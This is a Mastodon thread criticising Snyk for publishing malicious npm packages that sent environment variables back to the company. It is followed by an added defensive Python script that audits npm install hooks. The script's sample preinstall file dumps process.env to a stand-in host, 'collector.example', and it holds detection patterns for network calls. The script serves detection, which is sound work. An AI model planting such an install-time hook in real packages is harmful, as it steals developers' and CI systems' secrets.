Ancestors

Toot

Written by Will Dormann on 2025-01-18 at 22:46

Snyk publishes malicious packages to the public NPM registry.

I'm no expert on ethics, but I believe that this is... frowned upon?

https://sourcecodered.com/snyk-malicious-npm-package/

https://news.ycombinator.com/item?id=42690473

https://snyk.io/blog/snyk-security-labs-testing-update-cursor-com-ai-code-editor/

=> More information about this toot | More toots from wdormann@infosec.exchange

Descendants

Written by mandela on 2025-01-18 at 23:01

@wdormann a lot of red team ops end up using this same technique in public package repos. Usually they are smart to obfuscate their code and make sure the bad code only runs on their target systems.

This feels like a junior engineer at snyk went off the rails.

=> More information about this toot | More toots from mandela@infosec.exchange

Written by thepwnicorn on 2025-01-19 at 00:19

@wdormann sending the content of env vars back to Snyk should have been a no-go, because they would have almost certainly contained secrets of CI environments or dev systems, if a dependency confusion attack were successful.

=> More information about this toot | More toots from thepwnicorn@infosec.exchange
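A defender-side check for the pattern thepwnicorn describes, added here as an example that is not part of this thread and not Snyk's code: it flags npm lifecycle hooks whose code reads process.env and also reaches the network. The manifest and install script are constructed samples.

```python
import json
import re

# Install-time hooks npm runs automatically; a dependency-confusion package
# typically does its work in one of these (constructed sample below).
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
ENV_READ = re.compile(r"process\.env\b")
NET_SINK = re.compile(r"https?\.request\(|\bfetch\(|dns\.resolve|net\.connect\(")


def audit_package(package_json: str, script_sources: dict) -> dict:
    """Map each lifecycle hook to whether its code reads process.env and
    whether it reaches the network. script_sources maps file names
    referenced by a hook command to their JavaScript source."""
    scripts = json.loads(package_json).get("scripts", {})
    findings = {}
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        text = cmd  # inline commands count as well as referenced files
        for fname in re.findall(r"[\w./-]+\.js", cmd):
            text += "\n" + script_sources.get(fname.lstrip("./"), "")
        findings[hook] = {"env": bool(ENV_READ.search(text)),
                          "network": bool(NET_SINK.search(text))}
    return findings


def high_risk_hooks(findings: dict) -> list:
    """Hooks that both read the environment and talk to the network."""
    return sorted(h for h, f in findings.items() if f["env"] and f["network"])


# Constructed sample: an unscoped name with an implausibly high version and a
# preinstall hook, the shape the thread describes. Not Snyk's actual package.
SAMPLE_MANIFEST = json.dumps({
    "name": "internal-build-helper",
    "version": "99.0.0",
    "scripts": {"preinstall": "node install.js", "test": "echo ok"},
})
SAMPLE_SCRIPTS = {
    "install.js": "const https = require('https');\n"
                  "const body = JSON.stringify(process.env);\n"
                  "https.request({hostname: 'collector.example'}).end(body);\n"
}

if __name__ == "__main__":
    result = audit_package(SAMPLE_MANIFEST, SAMPLE_SCRIPTS)
    print(result)                   # {'preinstall': {'env': True, 'network': True}}
    print(high_risk_hooks(result))  # ['preinstall']
```

Run it against an unpacked tarball's package.json plus the referenced script files before allowing a package into an internal mirror; pair it with a scoped-registry policy so unscoped internal names cannot resolve to the public registry at all.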

Original URL
gemini://mastogem.picasoft.net/thread/113851784780748738